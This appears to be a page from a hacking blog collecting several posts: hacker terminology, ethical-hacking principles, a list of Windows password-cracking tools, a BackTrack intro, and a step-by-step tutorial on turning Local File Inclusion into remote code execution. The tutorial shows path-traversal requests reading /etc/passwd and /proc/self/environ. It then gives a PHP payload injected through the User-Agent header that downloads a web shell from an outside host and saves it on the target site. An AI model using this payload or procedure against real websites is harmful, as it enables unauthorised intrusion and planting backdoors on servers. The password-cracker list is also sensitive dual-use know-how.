What’s a Blackhat Hacker?

A black hat hacker is an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. Black hat hackers are also known as crackers or dark-side hackers. The general view is that, while hackers build things, crackers break things. They are computer security hackers that break into computers and networks or also create computer viruses. The term “black hat” comes from old westerns where the bad guys usually wore black hats and the good guys wore white ones.

White hat hackers also identify security weaknesses; but, instead of performing malicious attacks and theft, they expose the security flaw in such a way as to alert the owner that there is a breach so they can fix it before a black hat hacker can take advantage of it. Though they often start out as black hat hackers, white hat hackers sometimes are paid consultants or actual employees of a company that needs its systems protected. Other types of hackers include: blue hat hackers & gray hat hackers.  Blue hat hackers are security professionals that are invited by Microsoft to expose vulnerabilities in Windows products. Gray hat hackers are hackers that perform both malicious activities and helpful ones.

Posted by Editorial Team on 03:01 in

Working of an ethical hacker

Obeying the Ethical Hacking Commandments :

• Every ethical hacker must abide by a few basic commandments. If not, bad things can happen. I’ve seen these commandments ignored or forgotten when planning or executing ethical hacking tests. The results weren’t positive.

Working ethically :

• The word ethical in this context can be defined as working with high professional morals and principles. Whether you’re performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an ethical hacker must be aboveboard and must support the company’s goals. No hidden agendas are allowed!
• Trustworthiness is the ultimate tenet. The misuse of information is absolutely forbidden. That’s what the bad guys do.

Respecting privacy :

• Treat the information you gather with the utmost respect. All information you obtain during your testing — from Web-application log files to clear-text passwords — must be kept private. Don’t use this information to snoop into confidential corporate information or private lives. If you sense that someone should know there’s a problem, consider sharing that information with the appropriate manager.
• Involve others in your process. This is a “watch the watcher” system that can build trust and support your ethical hacking projects.

Not crashing your systems :

• One of the biggest mistakes I’ve seen when people try to hack their own systems is inadvertently crashing their systems. The main reason for this is poor planning. These testers have not read the documentation or misunderstand the usage and power of the security tools and techniques.
• You can easily create DoS conditions on your systems when testing. Running too many tests too quickly on a system causes many system lockups. I know because I’ve done this! Don’t rush things and assume that a network or specific host can handle the beating that network scanners and vulnerability assessment tools can dish out.

Executing the plan:

• In Ethical hacking, Time and patience are important. Be careful when you’re performing your ethical hacking tests. A Hacker in your network or an employee looking over your shoulder may watch what’s going on. This person could use this information against you. It’s not practical to make sure that no Hackers are on your systems before you start. Just make sure you keep everything as quiet and private as possible.
• This is especially critical when transmitting and storing your test results. You’re now on a reconnaissance mission. Find as much information as possible about your organization and systems, which is what malicious Hackers do.Start with a broad view of mind and narrow your focus. Search the Internet for your organization’s name, your computer and network system names, and your IP addresses. Google is a great place to start for this.
• Don’t take ethical hacking too far, though. It makes little sense to harden your systems from unlikely attacks. For instance, if you don’t have a internal Web server running, you may not have to worry too much about. However,don’t forget about insider threats from malicious employees or your friends or colleagues!

Posted by Editorial Team on 02:37 in What is Ethical Hacking

Best Windows Password Crackers

• ERD Commander

Microsoft Diagnostics and Recovery Toolset (MSDaRT) 6.5 helps diagnose and repair a system that has trouble starting or has other issues. When you start the system using the Emergency Repair Disk (ERD), also referred to as Boot CD for MSDaRT, a System Recovery Options dialog box appears. A graphical environment and a command-line console are available.

Download

• Hiren Boot CD

Hiren’s Boot CD is an all-in-one bootable CD solution that contains a load of useful tools you can make use of in a variety of situations. I am talking about hard drive failure, virus infections, partitioning, password recovery and data recovery.

Download

• Offline NT Password Cracker

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry’s SAM file.

Download

• Ophcrack

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Download

Active Password Changer	http://www.password-changer.com/
PC Login Now	http://pcloginnow.com
Trinity Rescue Kit	http://trinityhome.org
Windows Password Recovery Tool	http://www.windowspasswordsrecovery.com/
ElcomSoft System Recovery	http://www.elcomsoft.com

▌│█║▌║▌║ [ нacĸer poιnт ] ║▌║▌║█│▌

Posted by Editorial Team on 02:28 in

Uploading a shell to a website through Local File Inclusion [LFI to RCE]

1 – Introduction

2 – Finding LFI

3 – Checking if proc/self/environ is accessible

4 – Injecting malicious code

5 – Access our shell

6 – Shoutz

>> 1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and

injection malicious code in proc/self/environ.Is a step by step tutorial.

>> 2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

http://www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

http://www.website.com/view.php?page=../

and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

http://www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

http://www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

http://www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server athttp://www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

>> 4 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.

Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

http://www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

<?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the

website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.

>> 5 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

http://www.website.com/shell.php

Our shell is there.Injection was succesfully.

Posted by Editorial Team on 09:41 in

Introduction to BackTrack5

BackTrack is an all-in-one tool which is the heart of hackers (Both for Newbies and Professionals). If I had to talk about BackTrack and hacking then I would tell it off in just a single sentence that is ” BackTrack takes out the word impossible from a hackers dictionary!” BackTrack contains all the tools which are required for a hacker. Once you master the backtracking stuff then no one can beat you.

As this an Operating System (OS) I can’t give you a theoretical tutorial but will be giving a visual so I have embedded a video which will be helpful for you to understand how to handle and use BackTrack. This video I have found on YouTube and I am sharing with you guys!

Have a look…

Posted by Editorial Team on 09:38 in